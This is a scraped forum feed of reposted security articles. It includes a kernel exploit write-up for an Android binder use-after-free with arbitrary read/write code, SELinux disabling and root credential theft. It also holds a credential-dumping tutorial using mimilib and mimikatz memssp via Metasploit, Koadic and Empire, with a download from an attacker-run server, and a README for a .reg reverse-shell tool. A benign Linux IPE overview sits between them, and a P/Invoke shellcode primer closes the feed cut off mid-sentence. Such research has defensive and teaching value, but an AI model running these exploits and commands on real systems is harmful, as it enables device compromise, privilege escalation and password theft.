assert_spin_locked(&node->lock); if (proc) assert_spin_locked(&proc->inner_lock); if (strong) { if (internal) node->internal_strong_refs--; else node->local_strong_refs--; if (node->local_strong_refs || node->internal_strong_refs) return false; } else { if (!internal) node->local_weak_refs--; if (node->local_weak_refs || node->tmp_refs || !hlist_empty(&node->refs)) return false; } if (proc && (node->has_strong_ref || node->has_weak_ref)) { if (list_empty(&node->work.entry)) { binder_enqueue_work_ilocked(&node->work, &proc->todo); binder_wakeup_proc_ilocked(proc); } [1] } else { if (hlist_empty(&node->refs) && !node->local_strong_refs && !node->local_weak_refs && !node->tmp_refs) { if (proc) { binder_dequeue_work_ilocked(&node->work); rb_erase(&node->rb_node, &proc->nodes); binder_debug(BINDER_DEBUG_INTERNAL_REFS, "refless node %d deleted\n", node->debug_id); } else { [2] BUG_ON(!list_empty(&node->work.entry)); spin_lock(&binder_dead_nodes_lock); /* * tmp_refs could have changed so * check it again */ if (node->tmp_refs) { spin_unlock(&binder_dead_nodes_lock); return false; } [3] hlist_del(&node->dead_node); spin_unlock(&binder_dead_nodes_lock); binder_debug(BINDER_DEBUG_INTERNAL_REFS, "dead node %d deleted\n", node->debug_id); } return true; } } return false; } We can setup the node data such that we reach the else branch at [1] and ensure that node->proc is NULL. In that case we first reach the list_empty check at [2]. To bypass this check we need to setup an empty list (i.e. next and prev point to the list_head itself), which is why we require to leak the node address first. Once we've bypassed the check at [2], we can reach the hlist_del at [3] with controlled data. The function performs the following operations: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static inline void __hlist_del(struct hlist_node *n) { struct hlist_node *next = n->next; struct hlist_node **pprev = n->pprev; WRITE_ONCE(*pprev, next); if (next) next->pprev = pprev; } static inline void hlist_del(struct hlist_node *n) { __hlist_del(n); n->next = LIST_POISON1; n->pprev = LIST_POISON2; } This boils down to the classic unlink primitive where we can set *X = Y and *(Y+8) = X. Therefore, having two writable kernel addresses we can corrupt some of their data using this. Additionally, if we set next = NULL we can perform a single 8-byte NULL write by having just one kernel address. Reallocating freed nodes with arbitrary contents The steps for obtaining an unlink primitive leading to memory corrupion described above assume we can replace the freed object by a controlled object. We do not need full control of the object, but just enough to pass all the checks and trigger the hlist_del primitive without crashing. In order to achieve that, we used a well known technique: spraying with control messages through the sendmsg syscall. The code for this system call looks as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg, struct msghdr *msg_sys, unsigned int flags, struct used_address *used_address, unsigned int allowed_msghdr_flags) { struct compat_msghdr __user *msg_compat = (struct compat_msghdr __user *)msg; struct sockaddr_storage address; struct iovec iovstack[UIO_FASTIOV], *iov = iovstack; unsigned char ctl[sizeof(struct cmsghdr) + 20] __attribute__ ((aligned(sizeof(__kernel_size_t)))); /* 20 is size of ipv6_pktinfo */ unsigned char *ctl_buf = ctl; int ctl_len; ssize_t err; ... if (ctl_len > sizeof(ctl)) { [1] ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL); if (ctl_buf == NULL) goto out_freeiov; } err = -EFAULT; /* * Careful! Before this, msg_sys->msg_control contains a user pointer. * Afterwards, it will be a kernel pointer. Thus the compiler-assisted * checking falls down on this. */ [2] if (copy_from_user(ctl_buf, (void __user __force *)msg_sys->msg_control, ctl_len)) goto out_freectl; msg_sys->msg_control = ctl_buf; } ... out_freectl: if (ctl_buf != ctl) [3] sock_kfree_s(sock->sk, ctl_buf, ctl_len); out_freeiov: kfree(iov); return err; } At [1] a buffer is allocated on the kernel heap if the requested control message length is larger than the local ctl buffer. At [2] the control message is copied in from userland, and finally after the message is processed the allocated buffer is freed at [3]. We use a blocking call to make the system call block once the destination socket buffer is full, therefore blocking after the thread between points [2] and [3]. In this way we can control the lifetime of the replacement object. We could also make use of the approach used by Jann Horn in his PROCA exploit: let the sendmsg call complete, and immediately reallocate the object with e.g. a signalfd file descriptor. This would have the advantage of not needing a separate thread for each allocation, but otherwise the results should be fairly similar. In any case, using this type of spraying we can reallocate the freed binder_node with almost complete control, as we require in order to trigger the write primitives described earlier. One thing to note though is that if our spray fails, we'll end up crashing the kernel because of the amount of operations and checks being performed on the freed memory. However, this use-after-free has the very nice property that as long as we do not trigger the write primitive, we can simply close the binder file descriptor and the kernel won't notice any effects. Thus, before we try to trigger a write primitive, we use the leak primitive to verify that we have successfully reallocated the node. We can do this by simply having a large amount of pending transactions, and reading one each time we need to leak some data off the freed object. If the data is not what we expected, we can simply close the binder file descriptor and try again. This property makes the exploit quite reliable even in the presence of relatively unreliable reallocations. Obtaining an arbitrary read primitive At this point, we use the same arbitrary read technique as described in the OffensiveCon 2020 talk. That is, we corrupt file->f_inode and use the following code to perform reads: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd, unsigned long arg) { int error = 0; int __user *argp = (int __user *)arg; struct inode *inode = file_inode(filp); switch (cmd) { ... case FIGETBSZ: return put_user(inode->i_sb->s_blocksize, argp); ... If you looked at our slides, back in late 2018 we used a binder mapping spray to bypass PAN and have controlled data at a controlled location. However, the bug we are exploiting here was introduced while getting rid of the long-term kernel-side binder mappings. This means we cannot use binder mapping sprays anymore, and we must find another solution. The solution we came up with was pointing our f_inode field right into an epitem structure. This structure contains a completely controllable 64-bit field: the event.data field. We can modify this field by using ep_ctl(efd, EPOLL_CTL_MOD, fd, &event). Thus, if we line up the data field with the inode->i_sb field we'll be able to perform an arbitrary read. The following picture shows the setup graphically: Note how we have also corrupted the fllink.next field of the epitem, which now points back into the file->f_inode field due to our write primitive. This could be a problem if this field is ever used, but because we are the only users of these struct file and epitem instances, we just need to avoid calling any API that makes use of them and we'll be fine. Based on the setup depicted above, we can now construct an arbitrary read primitive as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 uint64_t read32(uint64_t addr) { struct epoll_event evt; evt.events = 0; evt.data.u64 = addr - 24; int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt); uint32_t test = 0xdeadbeef; ioctl(pipes[0], FIGETBSZ, &test); return test; } uint64_t read64(uint64_t addr) { uint32_t lo = read32(addr); uint32_t hi = read32(addr+4); return (((uint64_t)hi) << 32) | lo; } Note that we set the data field of the epitem to addr - 24, where 24 is the offset of s_blocksize within the superblock structure. Also, even though s_blocksize is in principle 64-bit long, the ioctl code only copies 32-bits back to userland so we need to read twice if we want to read 64 bit values. Now that we have an arbitrary read and we know the address of a struct file from our initial leak, we can simply read its f_op field to retrieve a kernel .text pointer. This then leads to fully bypassing KASLR: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 /* Step 1: leak a pipe file address */ file = node_new("leak_file"); /* Only works on file implementing the 'epoll' function. */ while (!node_realloc_epitem(file, pipes[0])) node_reset(file); uint64_t file_addr = file->file_addr; log_info("[+] pipe file: 0x%lx\n", file_addr); /* Step 2: leak epitem address */ struct exp_node *epitem_node = node_new("epitem"); while (!node_kaddr_disclose(file, epitem_node)) node_reset(epitem_node); printf("[*] file epitem at %lx\n", file->kaddr); /* * Alright, now we want to do a write8 to set file->f_inode. * Given the unlink primitive, we'll set file->f_inode = epitem + 80 * and epitem + 88 = &file->f_inode. * * With this we can change f_inode->i_sb by modifying the epitem data, * and get an arbitrary read through ioctl. * * This is corrupting the fllink, so we better don't touch anything there! */ struct exp_node *write8_inode = node_new("write8_inode"); node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20); printf("[*] Write done, should have arbitrary read now.\n"); uint64_t fop = read64(file_addr + 0x28); printf("[+] file operations: %lx\n", fop); kernel_base = fop - OFFSET_PIPE_FOP; printf("[+] kernel base: %lx\n", kernel_base); Disabling SELinux and setting up an arbitrary write primitive Now that we know the kernel base address, we can use our write primitive to write a NULL qword over the selinux_enforcing variable and set SELinux to permissive mode. Our exploit does this before setting up an arbitrary write primitive, because the technique we came up with actually requires disabling SELinux. After considering a few alternatives, we ended up settling for attacking the sysctl tables the kernel uses to handle /proc/sys and all the data hanging from there. There are a number of global tables describing these variables, such as kern_table below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 static struct ctl_table kern_table[] = { { .procname = "sched_child_runs_first", .data = &sysctl_sched_child_runs_first, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, #if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER) { .procname = "preemptoff_tracing_threshold_ns", .data = &sysctl_preemptoff_tracing_threshold_ns, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, { .procname = "irqsoff_tracing_threshold_ns", .data = &sysctl_irqsoff_tracing_threshold_ns, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, ... For example, the first variable is called "sched_child_runs_first", which means it can be accessed through /proc/sys/kernel/sched_child_runs_first. The file mode is 0644, so it's writable for root only (of course SELinux restrictions may apply) and it's an integer. The reading and writing is handled by the proc_dointvec function, which will convert the integer to and from string representation when the file is accessed. The data field points to where the variable is found in memory, which makes it an interesting target to obtain an arbitrary read/write primitive. We initially tried to target some of these variables, but then realized that this table is actually only used during kernel initialization. This means that corrupting the contents of this table is not very useful to us. However, this table is used to create a set of in-memory structures that define the existing sysctl variables and their permissions. These structures can be found by analyzing the sysctl_table_root structure, which contains an rb-tree of ctl_node nodes, which then point to ctl_table tables defining the variables themselves. Since we have a read primitive, we can parse the tree and find the left-most node within it, which has no children nodes. Under normal circumstances, this tree looks as shown in the picture below (only representing left-child connections to keep the diagram somewhat readable): If you look at the alphabetic order of these nodes, you can see that all left-child nodes are sorted in descending alphabetic order. In fact, this is the balancing rule in these trees: left-children have to be lower than the current node, and right-children higher. Thus, to ensure we keep the tree balanced, we add a left child to the left-most node with a name starting with "aaa" using our write8 primitive. The following code finds the left-most node of the tree in prev_node, which will be the insertion point for our fake node: 1 2 3 4 5 6 7 8 9 10 11 12 /* Now we can prepare our magic sysctl node as s child of the left-most node */ uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET; printf("[+] sysctl_table_root = %lx\n", sysctl_table_root); uint64_t ctl_dir = sysctl_table_root + 8; uint64_t node = read64(ctl_dir + 80); uint64_t prev_node; while (node != 0) { prev_node = node; node = read64(node + 0x10); } In order to insert the new node, we need to find a location within kernel memory for it. This is required because modern phones come with PAN (Privileged Access Never) enabled, which prevents the kernel from inadvertently using userland memory. Given that we have an arbitrary read primitive, we sort this out by parsing our process' page tables starting at current->mm->pgd and locating the address of one of our pages in the physmap. Additionally, using the physmap alias of our own userspace page is ideal because we can easily edit the nodes to change the address of the data we want to target, giving us a flexible read/write primitive. We resolve the physmap alias in the following way: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 /* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */ memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET); printf("[+] memstart_addr: 0x%lx\n", memstart_addr); uint64_t mm = read64(current + MM_OFFSET); uint64_t pgd = read64(mm + 0x40); uint64_t entry = read64(pgd); uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl); /* Offset 8 for 2MB boundary */ entry = read64(next_tbl + 8); next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl); entry = read64(next_tbl); uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); *(uint64_t *)map = 0xdeadbeefbadc0ded; if ( read64(kaddr) != 0xdeadbeefbadc0ded) { printf("[!] Something went wrong resolving the address of our mapping\n"); goto out; } Note we required to read the contents of memstart_addr in order to be able to translate between physical addresses and the corresponding physmap address. In any case, after running this code we know that the data we find at 0x200000 in our process address space can also be found at kaddr in kernel land. With this, we setup a new sysctl node as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 /* We found the insertion place, setup the node */ uint64_t node_kaddr = kaddr; void *node_uaddr = map; uint64_t tbl_header_kaddr = kaddr + 0x80; void *tbl_header_uaddr = map + 0x80; uint64_t ctl_table_kaddr = kaddr + 0x100; ctl_table_uaddr = map + 0x100; uint64_t procname_kaddr = kaddr + 0x200; void * procname_uaddr = map + 0x200; /* Setup rb_node */ *(uint64_t *)(node_uaddr + 0x00) = prev_node; // parent = prev_node *(uint64_t *)(node_uaddr + 0x08) = 0; // right = null *(uint64_t *)(node_uaddr + 0x10) = 0; // left = null *(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr; // my_tbl_header *(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr; *(uint64_t *)(tbl_header_uaddr + 0x18) = 0; // unregistering *(uint64_t *)(tbl_header_uaddr + 0x20) = 0; // ctl_Table_arg *(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root; // root *(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root; // set *(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8; // parent *(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr; // node *(uint64_t *)(tbl_header_uaddr + 0x48) = 0; // inodes.first /* Now setup ctl_table */ uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET; *(uint64_t *)(ctl_table_uaddr) = procname_kaddr; // procname *(uint64_t *)(ctl_table_uaddr + 😎 = kernel_base; // data == what to read/write *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; // max size *(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec; // proc_handler *(uint32_t *)(ctl_table_uaddr + 20) = 0666; // mode = rw-rw-rw- /* * Compute and write the node name. We use a random name starting with aaa * for two reasons: * * - Must be the first node in the tree alphabetically given where we insert it (hence aaa...) * * - If we already run, there's a cached dentry for each name we used earlier which has dangling * pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using * this dangling pointer at open time. * * It's easier to have a unique enough name instead of figuring out how to clear the cache, * which would be the cleaner solution here. */ int fd = open("/dev/urandom", O_RDONLY); uint32_t rnd; read(fd, &rnd, sizeof(rnd)); sprintf(procname_uaddr, "aaa_%x", rnd); sprintf(pathname, "/proc/sys/%s", procname_uaddr); /* And finally use a write8 to inject this new sysctl node */ struct exp_node *write8_sysctl = node_new("write8_sysctl"); node_write8(write8_sysctl, kaddr, prev_node + 16); This basically creates one file at /proc/sys/aaa_[random], with read/write permissions, and uses proc_douintvec to handle read/writes. This function will take the data field as the pointer to read from or write to, and allow up to max_size bytes to be read or written as unsigned integers. With this, we can setup a write primitive as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 void write64(uint64_t addr, uint64_t value) { *(uint64_t *)(ctl_table_uaddr + 😎 = addr; // data == what to read/write *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; char buf[100]; int fd = open(pathname, O_WRONLY); if (fd < 0) { printf("[!] Failed to open. Errno: %d\n", errno); } sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32)); int ret = write(fd, buf, strlen(buf)); if (ret < 0) printf("[!] Failed to write, errno: %d\n", errno); close(fd); } void write32(uint64_t addr, uint32_t value) { *(uint64_t *)(ctl_table_uaddr + 😎 = addr; // data == what to read/write *(uint32_t *)(ctl_table_uaddr + 16) = 4; char buf[100]; int fd = open(pathname, O_WRONLY); sprintf(buf, "%u\n", value); write(fd, buf, strlen(buf)); close(fd); } Getting root and cleaning up Once we have read/write capabilities on a Pixel phone, obtaining root access is as simple as copying the credentials from a root task. Since we have already disabled SELinux earlier, we just need to find the init credentials, bump their reference count and copy them to our process like this: 1 2 3 4 5 6 7 8 9 /* Set refcount to 0x100 and set our own credentials to init's */ write32(init_cred, 0x100); write64(current + REAL_CRED_OFFSET, init_cred); write64(current + REAL_CRED_OFFSET + 8, init_cred); if (getuid() != 0) { printf("[!!] Something went wrong, we're not root!!\n"); goto out; } However this is not enough to enjoy a root shell yet, since we have corrupted quite some memory in kernel land and things will break as soon as we exit the current process and execute the shell. There are a few things that we need to repair: The binder_node structures we used to perform write primitives were reallocated through sendmsg, but have been freed again when performing the write. We need to make sure the corresponding threads do not free these objects again upon returning from sendmsg. For that, we parse the thread stacks and replace any references we find to these nodes by ZERO_SIZE_PTR. We have modified the f_inode of a struct file, which now points into the middle of an epitem. The easiest way around this is to simply bump the reference count for this file such that release is never called on it. While setting up the read primitive, we also corrupted a field in the epitem itself. This field was a linked list with one epitem only, so we can just copy the fllist.prev field on top of fllist.next to restore the list. We also added a fake entry to /proc/sys, which we could leave around ... but in that case it'd be pointing to pages that belonged to our exploit and are now recycled by the kernel. We decided to just remove it from the rb-tree. Note that this makes the entry disappear from the userland view, but there is still a cached path in the kernel. Since we used a randomized name, chances are small that anybody would try to access it in the future by directly opening it. After cleaning all this mess up, we can finally execute our root shell and enjoy uid 0 without a crashing phone. Demonstration video The following video shows the process of rooting the phone from an adb shell using the exploit we just described: Code You can find the code for the exploits described in this and the previous post at the Blue Frost Security GitHub. The exploit has only been tested on a Pixel 3 phone using the firmware from February 2020, and would need to be adapted for other firmwares. In particular there are a number of kernel offsets used in the exploit, as well as structure offsets that may vary between kernel versions. Sursa: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
-
Integrity Policy Enforcement (IPE) Overview IPE is a Linux Security Module, which allows for a configurable policy to enforce integrity requirements on the whole system. It attempts to solve the issue of code integrity: that any code being executed (or files being read), are identical to the version that was built by a trusted source. Simply stated, IPE helps the owner of a system ensure that only code they have authorized is allowed to execute. There are multiple implementations already within the Linux kernel that solve some measure of integrity verification. For instance, device-mapper verity, which ensures integrity for a block device, and fs-verity which is a system that ensures integrity for a filesystem. What these implementations lack is a measure of run-time verification that binaries are sourced from these locations. IPE aims to address this gap. IPE is separated between two major components: A configurable policy, provided by the LSM ("IPE Core"), and deterministic attributes provided by the kernel to evaluate files against, ("IPE Properties"). What is the value of code integrity? Code integrity is identified as one of the most effective security mitigations for modern systems. With Private Key Infrastructure and code signing you can effectively control the execution of all binaries on a system to be restricted to a known subset. This eliminates attacks such as: Linker hijacking (LD_PRELOAD, LD_AUDIT, DLL Injection) Binary rewriting Malicious binary execution / loading As a result, most of the low effort, high value attacks are mitigated completely. Use Cases IPE is designed for use in devices with a specific purpose like embedded systems (e.g. network firewall device in a data center), where all software and configuration is built and provisioned by the owner. Ideally, a system which leverages IPE is not intended for general purpose computing and does not utilize any software or configuration built by a third party. An ideal system to leverage IPE has both mutable and immutable components, however, all binary executable code is immutable. For the highest level of security, platform firmware should verify the the kernel and optionally the root filesystem (e.g. via U-Boot verified boot). This allows the entire system to be integrity verified. Known Gaps IPE cannot verify the integrity of anonymous executable memory, such as the trampolines created by gcc closures and libffi, or JIT'd code. Unfortunately, as this is dynamically generated code, there is no way for IPE to detect that this code has not been tampered with in transition from where it was built, to where it is running. As a result, IPE is incapable of tackling this problem for dynamically generated code. IPE cannot verify the integrity of interpreted languages' programs when these scripts invoked via <interpreter> <file>. This is because the way interpreters execute these files, the scripts themselves are not evaluated as executable code through one of IPE's hooks. Interpreters can be enlightened to the usage of IPE by trying to mmap a file into executable memory (+X), after opening the file and responding to the error code appropriately. This also applies to included files, or high value files, such as configuration files of critical system components. This specific gap is planned on being addressed within IPE. Sursa: https://microsoft.github.io/ipe/
-
Credential Dumping: Security Support Provider (SSP) posted inRed Teaming on April 8, 2020 by Raj Chandel SHARE In this article, we will dump the windows login credentials by exploiting SSP. This is our fourth article in the series of credential dumping. Both local and remote method is used in this article to cover every aspect of pentesting. Table of content: Introduction to Security Support Provider (SSP) Manual Mimikatz Metasploit Framework Koadic Powershell Empire Introduction to Security Support Provider Security Support Provider (SSP) is an API used by windows to carry out authentications of windows login. it’s DLL file that provides security packages to other applications. This DLL stack itself up in LSA when the system starts; making it a start-up process. After it is loaded in LSA, it can access all of the window’s credentials. The configurations of this file are stored in two different registry keys and you find them in the following locations: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages 1 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages Manual The first method that we are going to use to exploit SSP is manual. Once the method is successfully carried out and the system reboots itself, it will dump the credentials for us. These credentials can be found in a file that will be created upon user login with the name of kiwissp. This file can find in registry inside hklm\system\currentcontrolset\control\lsa. The first step in this method is to copy the mimilib.dll file from mimikatz folder to the system32 folder. This file is responsible for creating kiwissp file which stores credentials in plaintext for us. Then navigate yourself to hklm\system\currentcontrolset\control\lsa. And here you can find that there is no entry in Security Packages as shown in the image below: The same can be checked with the following PowerShell command: reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 1 reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" Just as shown in the image below, there is no entry. So, this needs to be changed if want to dump the credentials. We need to add all the services that helps SSP to manage credentials; such as Kerberos, wdigest etc. Therefore we will use the following command to make these entries: reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f 1 reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f And then to confirm whether the entry has been done or not, use the following command: reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 1 reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" You can then again navigate yourself to hklm\system\currentcontrolset\control\lsa to the enteries that you just made. Now, whenever the user reboots their PC, a file with the name of kiwissp.log will be created in system32. Then this file will have your credentials stored in cleartext. Use the following command to read the credentials: type C:\Windows\System32\kiwissp.log 1 type C:\Windows\System32\kiwissp.log Mimikatz Mimikatz provides us with a module that injects itself in the memory and when the user is signed out of the windows, then upon signing in the passwords are retrieved from the memory with the help of this module. For this method, just load mimikatz and type: privilege::debug misc::memssp 1 2 privilege::debug misc::memssp Running the above commands will create mimilsa.log file in system32 upon logging in by the user. To read this file use the following command; type C:\Windows\System32\mimilsa.log 1 type C:\Windows\System32\mimilsa.log Metasploit Framework When dumping credentials remotely, Metasploit really comes handy. The ability of Metasploit providing us with kiwi extension allows us to dump credentials by manipulating SSP just like our previous method. Now when you have meterpreter session through Metasploit use load kiwi command to initiate kiwi extension. And then to inject the mimikatz module in memory use the following command: kiwi_cmd misc::memssp 1 kiwi_cmd misc::memssp Now the module has been successfully injected in the memory. As this module creates the file with clear text credential when the user logs in after the memory injection; we will force the lock screen on the victim so that after login we can have our credentials. For this run the following commands: shell RunDll32.exe user32.dll,LockWorkStation 1 2 shell RunDll32.exe user32.dll,LockWorkStation Now we have forced the user to logout the system. Whenever the user will log in our mimilsa file will be created in the system32 and to read the file use the following command: type C:\Windows\System32\mimilsa.log 1 type C:\Windows\System32\mimilsa.log Koadic Just like Metasploit, Kodiac too provides us with similar mimikatz module; so, let’s get to dumping the credentials. Once you have a session with kodiac, use the following exploit to inject the payload in the memory: use mimikatz_dynwrapx set MIMICMD misc::memssp execute 1 2 3 use mimikatz_dynwrapx set MIMICMD misc::memssp execute Once the above exploit has successfully executed itself, use the following commands to force the user to sign out of the windows and then run the dll command to read the mimilsa file: cmdshell 0 RunDll32.exe user32.dll,LockWorkStation type mimilsa.log 1 2 3 cmdshell 0 RunDll32.exe user32.dll,LockWorkStation type mimilsa.log As shown in the above image, you will have your credentials. PowerShell Empire Empire is an outstanding tool, we have covered the PowerShell empire in a series of article, to read the article click here. With the help of mimikatz, empire allows us to inject the payload in the memory which further allows us to retrieve windows logon credentials. Once to have a session through the empire, use the following post exploit to get your hands on the credentials: usemodule persistence/misc/memssp execute 1 2 usemodule persistence/misc/memssp execute After the exploit has executed itself successfully, all that is left to do is lock the user out of their system so that when they sign in, we can have the file that saves credentials in plaintext for us. And no to lock the user out of their system use the following exploit: usemodule management/lock execute 1 2 usemodule management/lock execute After the user logs in, the said file will be created. To read the contents of the file use the following command: type C:\Windows\System32\mimilsa.log 1 type C:\Windows\System32\mimilsa.log Powershell Empire: mimilib.dll In the manual method, everything that w did can also be done remotely through empire which is useful in external penetration testing. The first step in this method is to send the mimilib.dll file from mimikatz folder to the system32 folder in the target system. To do so, simply go to the mimikatz folder where the mimilib.dll file is located and initiate the python server as shown in the following image: python -m SimpleHTTPServer 1 python -m SimpleHTTPServer After that, through your session, run the following set shell commands to do the deed: shell wget http://192.168.1.112:8000/mimilib.dll -outfile mimilib.dll reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" shell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f 1 2 3 shell wget http://192.168.1.112:8000/mimilib.dll -outfile mimilib.dll reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" shell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f From the above set of commands, the first command will download mimilib.dll from your previously made python server into the target PC and the rest of the two commands will edit the registry key value for you. As the commands have executed successfully, all now you have to do is wait for the target system to restart. And once that happens your file will be created. To access the file, use the following command: shell type kiwissp.log 1 shell type kiwissp.log And we have our credentials. Yay! Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here Sursa: https://www.hackingarticles.in/credential-dumping-security-support-provider-ssp/
-
Evilreg v1.0 Author: github.com/thelinuxchoice Twitter: twitter.com/linux_choice Read the license before using any part from this code Reverse shell using Windows Registry file (.reg). Features: Reverse TCP Port Forwarding using Ngrok.io Requirements: Ngrok Authtoken (for TCP Tunneling): Sign up at: https://ngrok.com/signup Your authtoken is available on your dashboard: https://dashboard.ngrok.com Install your auhtoken: ./ngrok authtoken <YOUR_AUTHTOKEN> Target must reboot/re-login after installing the .reg file Legal disclaimer: Usage of Evilreg for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program Usage: git clone https://github.com/thelinuxchoice/evilreg cd evilreg bash evilreg.sh Donate! Pay a coffee: Paypal: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CLKRT5QXXFJY4&source=url Sursa: https://github.com/thelinuxchoice/evilreg
-
Offensive P/Invoke: Leveraging the Win32 API from Managed Code Matt Hand Follow Aug 14, 2019 · 6 min read With the rise in offensive .NET, particularly C#, tooling, we are seeing a great expansion in operational capability, especially with regards to running our code in memory (e.g. Cobalt Strike’s execute-assembly). While C# provides a great deal of functionality on the surface, sometimes we need to leverage functions of the operating system not readily accessible from managed code. Thankfully, .NET offers and integration with the Windows API through a technology called Platform Invoke, or P/Invoke for short. Why P/Invoke? Consider this common situation: you need to allocate memory in your current process to copy in shellcode and then create a new thread to execute it. Because the Common Language Runtime (CLR) manages things like memory allocation for us, hence the term “managed code”, this is not possible through the built-in functionality of .NET. To use the 2 functions we need, VirtualAlloc() and CreateThread(), we need to be able to call them from “kernel32.dll”. This is where P/Invoke comes into play. P/Invoke, or specifically the System.Runtime.InteropServices namespace, provides the ability to call external DLLs with the DllImport attribute. In our example, we can simply import “kernel32.dll”, and reference the external methods VirtualAlloc() and CreateThread() using the exact same signature as the unmanaged (C/C++) one. Marshaling Because we are interacting with unmanaged functions from managed code, we need to be able to automatically handle things like datatype conversion. Simply put, that is what marshaling does for us. The graphic below shows a high-level overview of how your C# code interacts with unmanaged code. Credit: https://mark-borg.github.io/blog/2017/interop/ A practical example of this is converting an unmanaged function signature to a managed one. Let’s take the signature for VirtualAlloc() from our example above. LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ); We can see that VirtualAlloc() returns a pointer to a void object (LPVOID) and takes a LPVOID for the lpAddress parameter, an unsigned integer (SIZE_T) for dwSize, and a doubleword (DWORD) for the flAllocationType and flProtect parameters. Since these aren’t valid types in .NET, we need to convert them. I have created a table of types I have run into to help with the conversion: Using this table, the signature for VirtualAlloc() we would need to use in our C# code would be: [DllImport(“kernel32.dll”)] private static extern IntPtr VirtualAlloc( IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect); In some cases, you may see ref or out prepended to the type. These tell the compiler that data can flow in or out of the function. ref specifies both directions and out specifies that data will only come out of the function. Handling Character Encoding Sometimes you may see additional enumerations in a DllImport such as the following: [DllImport(“user32.dll”), Charset = CharSet.Unicode, SetLastError = true] The Charset definition is used to specify either ANSI or Unicode encoding. To tell whether you may need to specify this, consider the function you are calling and the data you are processing. Typically, a function which ends in “A”, such as MessageBoxA(), will handle ANSI text and a function which ends in “W”, such as MessageBoxW() will handle “wide” or Unicode text. By default, this is set to CharSet.Ansi in C#, so leaving this blank will use ANSI text encoding. Catching Win32 Errors The SetLastError field is a way to manage consuming API error messages that we would otherwise miss due to (un)marshaling. Simply put, this just provides us with the ability to handle errors in our external function via a call to Marshal.GetLastWin32Error(). Consider the following code: if (RemoveDirectory(@”C:\Windows\System32")) Console.Writeline(“This won’t work”); else Console.WriteLine(Marshal.GetLastWin32Error()); 